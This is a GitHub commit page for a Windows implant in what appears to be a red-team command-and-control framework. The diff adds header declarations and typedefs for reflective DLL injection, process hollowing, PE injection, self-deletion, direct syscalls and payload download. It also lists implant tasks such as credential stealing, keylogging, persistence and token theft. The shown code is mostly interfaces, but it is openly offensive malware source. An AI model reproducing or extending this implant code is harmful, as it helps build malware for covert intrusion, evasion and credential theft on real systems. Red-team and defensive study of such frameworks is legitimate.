Skip to content

Commit

Permalink
Refactor implant code
Browse files Browse the repository at this point in the history
  • Loading branch information
@hideckies
hideckies committed May 7, 2024
1 parent 2eedce3 commit a2178a2
Show file tree
Hide file tree
Showing 23 changed files with 1,153 additions and 229 deletions.
3 changes: 2 additions & 1 deletion payload/win/implant/CMakeLists.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -75,6 +75,7 @@ set(SOURCE_CORE
src/core/system/registry.cpp
src/core/system/user.cpp
src/core/technique/injection/dll_injection.cpp
src/core/technique/injection/pe_injection.cpp
src/core/technique/injection/shellcode_injection.cpp
src/core/task/assembly.cpp
src/core/task/cat.cpp
Expand All @@ -86,7 +87,6 @@ set(SOURCE_CORE
src/core/task/dll.cpp
src/core/task/download.cpp
src/core/task/env.cpp
src/core/task/exe.cpp
src/core/task/group.cpp
src/core/task/history.cpp
src/core/task/ip.cpp
Expand All @@ -99,6 +99,7 @@ set(SOURCE_CORE
src/core/task/mkdir.cpp
src/core/task/mv.cpp
src/core/task/net.cpp
src/core/task/pe.cpp
src/core/task/persist.cpp
src/core/task/procdump.cpp
src/core/task/ps.cpp
Expand Down
54 changes: 54 additions & 0 deletions payload/win/implant/include/core/ntdll.hpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,16 @@ typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];

typedef struct BASE_RELOCATION_BLOCK {
DWORD PageAddress;
DWORD BlockSize;
} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {
USHORT Offset : 12;
USHORT Type : 4;
} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;

// **For NtSystemDebugControl**
typedef enum _SYSDBG_COMMAND
{
Expand Down Expand Up @@ -177,4 +187,48 @@ typedef struct _KEY_VALUE_FULL_INFORMATION
// UCHAR Data[1];
} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;

typedef struct _FILE_RENAME_INFO {
union {
BOOLEAN ReplaceIfExists;
DWORD Flags;
} DUMMYUNIONNAME;
// BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
DWORD FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFO, *PFILE_RENAME_INFO;

typedef struct _FILE_DISPOSITION_INFO {
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFO, *PFILE_DISPOSITION_INFO;

typedef enum _FILE_INFO_BY_HANDLE_CLASS {
FileBasicInfo,
FileStandardInfo,
FileNameInfo,
FileRenameInfo,
FileDispositionInfo,
FileAllocationInfo,
FileEndOfFileInfo,
FileStreamInfo,
FileCompressionInfo,
FileAttributeTagInfo,
FileIdBothDirectoryInfo,
FileIdBothDirectoryRestartInfo,
FileIoPriorityHintInfo,
FileRemoteProtocolInfo,
FileFullDirectoryInfo,
FileFullDirectoryRestartInfo,
FileStorageInfo,
FileAlignmentInfo,
FileIdInfo,
FileIdExtdDirectoryInfo,
FileIdExtdDirectoryRestartInfo,
FileDispositionInfoEx,
FileRenameInfoEx,
FileCaseSensitiveInfo,
FileNormalizedNameInfo,
MaximumFileInfoByHandleClass
} FILE_INFO_BY_HANDLE_CLASS, *PFILE_INFO_BY_HANDLE_CLASS;

#endif // HERMIT_CORE_NTDLL_H
27 changes: 23 additions & 4 deletions payload/win/implant/include/core/procs.hpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -39,8 +39,8 @@ namespace Procs

// NtFlushInstructionCache
typedef NTSTATUS (NTAPI* LPPROC_NTFLUSHINSTRUCTIONCACHE)(HANDLE ProcessHandle, PVOID BaseAddress, SIZE_T Length);
// NtCreateProcess
typedef NTSTATUS (NTAPI* LPPROC_NTCREATEPROCESS)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ParentProcess, BOOLEAN InheritObjectTable, HANDLE SectionHandle, HANDLE DebugPort, HANDLE TokenHandle);
// NtCreateProcessEx
typedef NTSTATUS (NTAPI* LPPROC_NTCREATEPROCESSEX)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ParentProcess, ULONG Flags, HANDLE SectionHandle, HANDLE DebugPort, HANDLE TokenHandle, ULONG Reserved);
// NtOpenProcess
typedef NTSTATUS (NTAPI* LPPROC_NTOPENPROCESS)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
// NtOpenProcessToken
Expand All @@ -53,8 +53,14 @@ namespace Procs
typedef NTSTATUS (NTAPI* LPPROC_NTCREATETHREADEX)(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE StartRoutine, PVOID Argument, ULONG CreateFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PPS_ATTRIBUTE_LIST AttributeList);
// NtResumeThread
typedef NTSTATUS (NTAPI* LPPROC_NTRESUMETHREAD)(HANDLE ThreadHandle, PULONG PreviousSuspendCount);
// NtGetContextThread
typedef NTSTATUS (NTAPI* LPPROC_NTGETCONTEXTTHREAD)(HANDLE ThreadHandle, PCONTEXT ThreadContext);
// NtSetContextThread
typedef NTSTATUS (NTAPI* LPPROC_NTSETCONTEXTTHREAD)(HANDLE ThreadHandle, PCONTEXT ThreadContext);
// NtAllocateVirtualMemory
typedef NTSTATUS (NTAPI* LPPROC_NTALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
// NtReadVirtualMemory
typedef NTSTATUS (NTAPI* LPPROC_NTREADVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, SIZE_T BufferSize, PSIZE_T NumberOfBytesRead);
// NtWriteVirtualMemory
typedef NTSTATUS (NTAPI* LPPROC_NTWRITEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
// NtProtectVirtualMemory
Expand Down Expand Up @@ -101,6 +107,8 @@ namespace Procs
typedef NTSTATUS (NTAPI* LPPROC_NTQUERYKEY)(HANDLE KeyHandle, KEY_INFORMATION_CLASS KeyInformationClass, PVOID KeyInformation, ULONG Length, PULONG ResultLength);
// NtEnumerateValueKey
typedef NTSTATUS (NTAPI* LPPROC_NTENUMERATEVALUEKEY)(HANDLE KeyHandle, ULONG Index, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength);
// NtUnmapViewOfSection
typedef NTSTATUS (NTAPI* LPPROC_NTUNMAPVIEWOFSECTION)(HANDLE ProcessHandle, PVOID BaseAddress);

// **NATIVE APIs (RUNTIME LIBRARY)**
// RtlAllocateHeap
Expand Down Expand Up @@ -145,6 +153,8 @@ namespace Procs
typedef BOOL (WINAPI* LPPROC_VIRTUALFREE)(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
// closeHandle
typedef BOOL (WINAPI* LPPROC_CLOSEHANDLE)(HANDLE hObject);
// SetFileInformationByHandle
typedef BOOL (WINAPI* LPPROC_SETFILEINFORMATIONBYHANDLE)(HANDLE hFile, FILE_INFO_BY_HANDLE_CLASS FileInformationClass, LPVOID lpFileInformation, DWORD dwBufferSize);
// MessageBoxA
typedef int (WINAPI* LPPROC_MESSAGEBOXA)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);
// WinHttpOpen
Expand Down Expand Up @@ -173,14 +183,17 @@ namespace Procs
struct PROCS
{
// **NATIVE APIs**
LPPROC_NTCREATEPROCESS lpNtCreateProcess = nullptr;
LPPROC_NTCREATEPROCESSEX lpNtCreateProcessEx = nullptr;
LPPROC_NTOPENPROCESS lpNtOpenProcess = nullptr;
LPPROC_NTOPENPROCESSTOKEN lpNtOpenProcessToken = nullptr;
LPPROC_NTTERMINATEPROCESS lpNtTerminateProcess = nullptr;
LPPROC_NTSETINFORMATIONPROCESS lpNtSetInformationProcess = nullptr;
LPPROC_NTCREATETHREADEX lpNtCreateThreadEx = nullptr;
LPPROC_NTRESUMETHREAD lpNtResumeThread = nullptr;
LPPROC_NTGETCONTEXTTHREAD lpNtGetContextThread = nullptr;
LPPROC_NTSETCONTEXTTHREAD lpNtSetContextThread = nullptr;
LPPROC_NTALLOCATEVIRTUALMEMORY lpNtAllocateVirtualMemory = nullptr;
LPPROC_NTREADVIRTUALMEMORY lpNtReadVirtualMemory = nullptr;
LPPROC_NTWRITEVIRTUALMEMORY lpNtWriteVirtualMemory = nullptr;
LPPROC_NTPROTECTVIRTUALMEMORY lpNtProtectVirtualMemory = nullptr;
LPPROC_NTFREEVIRTUALMEMORY lpNtFreeVirtualMemory = nullptr;
Expand All @@ -204,6 +217,7 @@ namespace Procs
LPPROC_NTOPENKEYEX lpNtOpenKeyEx = nullptr;
LPPROC_NTQUERYKEY lpNtQueryKey = nullptr;
LPPROC_NTENUMERATEVALUEKEY lpNtEnumerateValueKey = nullptr;
LPPROC_NTUNMAPVIEWOFSECTION lpNtUnmapViewOfSection = nullptr;

// **RUNTIME LIBRARY APIs**
LPPROC_RTLALLOCATEHEAP lpRtlAllocateHeap = nullptr;
Expand All @@ -219,6 +233,7 @@ namespace Procs

// **WINAPIs**
LPPROC_QUERYFULLPROCESSIMAGENAMEW lpQueryFullProcessImageNameW = nullptr;
LPPROC_SETFILEINFORMATIONBYHANDLE lpSetFileInformationByHandle = nullptr;
LPPROC_WINHTTPOPEN lpWinHttpOpen = nullptr;
LPPROC_WINHTTPCONNECT lpWinHttpConnect = nullptr;
LPPROC_WINHTTPOPENREQUEST lpWinHttpOpenRequest = nullptr;
Expand All @@ -232,14 +247,17 @@ namespace Procs
LPPROC_WINHTTPCLOSEHANDLE lpWinHttpCloseHandle = nullptr;

// **SYSCALLS**
Syscalls::SYSCALL sysNtCreateProcess = {0};
Syscalls::SYSCALL sysNtCreateProcessEx = {0};
Syscalls::SYSCALL sysNtOpenProcess = {0};
Syscalls::SYSCALL sysNtOpenProcessToken = {0};
Syscalls::SYSCALL sysNtTerminateProcess = {0};
Syscalls::SYSCALL sysNtSetInformationProcess = {0};
Syscalls::SYSCALL sysNtCreateThreadEx = {0};
Syscalls::SYSCALL sysNtResumeThread = {0};
Syscalls::SYSCALL sysNtGetContextThread = {0};
Syscalls::SYSCALL sysNtSetContextThread = {0};
Syscalls::SYSCALL sysNtAllocateVirtualMemory = {0};
Syscalls::SYSCALL sysNtReadVirtualMemory = {0};
Syscalls::SYSCALL sysNtWriteVirtualMemory = {0};
Syscalls::SYSCALL sysNtProtectVirtualMemory = {0};
Syscalls::SYSCALL sysNtFreeVirtualMemory = {0};
Expand All @@ -263,6 +281,7 @@ namespace Procs
Syscalls::SYSCALL sysNtOpenKeyEx = {0};
Syscalls::SYSCALL sysNtQueryKey = {0};
Syscalls::SYSCALL sysNtEnumerateValueKey = {0};
Syscalls::SYSCALL sysNtUnmapViewOfSection = {0};

Syscalls::SYSCALL sysRtlAllocateHeap = {0};
Syscalls::SYSCALL sysRtlInitUnicodeString = {0};
Expand Down
28 changes: 26 additions & 2 deletions payload/win/implant/include/core/system.hpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -70,10 +70,12 @@ namespace System::Priv

namespace System::Process
{
HANDLE ProcessCreate(
HANDLE ProcessCreate(
Procs::PPROCS pProcs,
LPCWSTR lpApplicationName,
LPCWSTR lpApplicationName,
DWORD dwDesiredAccess,
BOOL bInheritHandles,
DWORD dwCreationFlags,
HANDLE hParentProcess,
HANDLE hToken
);
Expand All @@ -95,10 +97,19 @@ namespace System::Process
PVOID VirtualMemoryAllocate(
Procs::PPROCS pProcs,
HANDLE hProcess,
PVOID pBaseAddr,
SIZE_T dwSize,
DWORD dwAllocationType,
DWORD dwProtect
);
BOOL VirtualMemoryRead(
Procs::PPROCS pProcs,
HANDLE hProcess,
PVOID pBaseAddr,
PVOID pBuffer,
SIZE_T dwBufferSize,
PSIZE_T lpNumberOfBytesRead
);
BOOL VirtualMemoryWrite(
Procs::PPROCS pProcs,
HANDLE hProcess,
Expand Down Expand Up @@ -193,6 +204,9 @@ namespace System::Fs
Procs::PPROCS pProcs,
HANDLE hFile
);
BOOL SelfDelete(
Procs::PPROCS pProcs
);
}

namespace System::Http
Expand Down Expand Up @@ -227,6 +241,16 @@ namespace System::Http
Procs::PPROCS pProcs,
HINTERNET hRequest
);
std::vector<BYTE> DataDownload(
Procs::PPROCS pProcs,
Crypt::PCRYPT pCrypt,
HINTERNET hConnect,
LPCWSTR lpHost,
INTERNET_PORT nPort,
LPCWSTR lpPath,
LPCWSTR lpHeaders,
const std::wstring& wSrc
);
BOOL FileDownload(
Procs::PPROCS pProcs,
Crypt::PCRYPT pCrypt,
Expand Down
33 changes: 16 additions & 17 deletions payload/win/implant/include/core/task.hpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,6 @@
#include <psapi.h>
#include <strsafe.h>
#include <synchapi.h>
// #include <tlhelp32.h>
#include <chrono>
#include <map>
#include <string>
Expand Down Expand Up @@ -51,19 +50,19 @@
#define TASK_DLL 0x08
#define TASK_DOWNLOAD 0x09
#define TASK_ENV_LS 0x10
#define TASK_EXE 0x11
#define TASK_GROUP_LS 0x12
#define TASK_HISTORY 0x13
#define TASK_IP 0x14
#define TASK_JITTER 0x15
#define TASK_KEYLOG 0x16
#define TASK_KILL 0x17
#define TASK_KILLDATE 0x18
#define TASK_LS 0x19
#define TASK_MIGRATE 0x20
#define TASK_MKDIR 0x21
#define TASK_MV 0x22
#define TASK_NET 0x23
#define TASK_GROUP_LS 0x11
#define TASK_HISTORY 0x12
#define TASK_IP 0x13
#define TASK_JITTER 0x14
#define TASK_KEYLOG 0x15
#define TASK_KILL 0x16
#define TASK_KILLDATE 0x17
#define TASK_LS 0x18
#define TASK_MIGRATE 0x19
#define TASK_MKDIR 0x20
#define TASK_MV 0x21
#define TASK_NET 0x22
#define TASK_PE 0x23
#define TASK_PERSIST 0x24
#define TASK_PROCDUMP 0x25
#define TASK_PS_KILL 0x26
Expand Down Expand Up @@ -136,10 +135,9 @@ namespace Task
std::wstring Connect(State::PSTATE pState, const std::wstring& wListenerURL);
std::wstring Cp(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
std::wstring CredsSteal(State::PSTATE pState);
std::wstring Dll(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc);
std::wstring Dll(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc, const std::wstring& wTechnique);
std::wstring Download(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
std::wstring EnvLs(State::PSTATE pState);
std::wstring Exe(State::PSTATE pState, const std::wstring& wExeSrc);
std::wstring GroupLs();
std::wstring History(State::PSTATE pState);
std::wstring Ip();
Expand All @@ -152,6 +150,7 @@ namespace Task
std::wstring Mkdir(State::PSTATE pState, const std::wstring& wDir);
std::wstring Mv(State::PSTATE pState, const std::wstring& wSrc, const std::wstring& wDest);
std::wstring Net();
std::wstring Pe(State::PSTATE pState, const std::wstring& wTargetProcess, const std::wstring& wSrc, const std::wstring& wTechnique);
std::wstring Persist(State::PSTATE pState, const std::wstring& wTechnique);
std::wstring Procdump(State::PSTATE pState, const std::wstring& wPid);
std::wstring PsKill(State::PSTATE pState, const std::wstring& wPid);
Expand All @@ -165,7 +164,7 @@ namespace Task
std::wstring RportfwdRm(State::PSTATE pState);
std::wstring RunAs(State::PSTATE pState, const std::wstring& wUser, const std::wstring& wPassword, const std::wstring& wCmd);
std::wstring Screenshot(State::PSTATE pState);
std::wstring Shellcode(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc);
std::wstring Shellcode(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wSrc, const std::wstring& wTechnique);
std::wstring SleepSet(State::PSTATE pState, const std::wstring& wSleep);
std::wstring TokenRevert();
std::wstring TokenSteal(State::PSTATE pState, const std::wstring& wPid, const std::wstring& wProcName, bool bLogin);
Expand Down
43 changes: 39 additions & 4 deletions payload/win/implant/include/core/technique.hpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,15 +7,50 @@
#include <windows.h>
#include <vector>

typedef ULONG_PTR (WINAPI * LPPROC_REFLECTIVEDLLLOADER)();
typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);

#define DEREF(name)*(UINT_PTR *)(name)
#define DEREF_64(name)*(DWORD64 *)(name)
#define DEREF_32(name)*(DWORD *)(name)
#define DEREF_16(name)*(WORD *)(name)
#define DEREF_8(name)*(BYTE *)(name)

namespace Technique::Injection::Helper
{
DWORD Rva2Offset(DWORD dwRva, UINT_PTR uBaseAddr);
DWORD GetFuncOffset(LPVOID lpBuffer, LPCSTR lpFuncName);
}

namespace Technique::Injection
{
// DLL
BOOL DllInjection(
Procs::PPROCS pProcs,
DWORD dwPID,
LPVOID lpDllPath,
DWORD dwDllPathSize
Procs::PPROCS pProcs,
DWORD dwPID,
std::vector<BYTE> bytes
);
BOOL ReflectiveDLLInjection(
Procs::PPROCS pProcs,
DWORD dwPID,
std::vector<BYTE> bytes
);

// PE
BOOL DirectExecution(
Procs::PPROCS pProcs,
std::vector<BYTE> bytes
);
BOOL PEInjection(
Procs::PPROCS pProcs
);
BOOL ProcessHollowing(
Procs::PPROCS pProcs,
LPVOID lpBuffer,
const std::wstring &wTargetProcess
);

// Shellcode
BOOL ShellcodeInjection(
Procs::PPROCS pProcs,
DWORD dwPID,
Expand Down
Loading

0 comments on commit a2178a2

Please sign in to comment.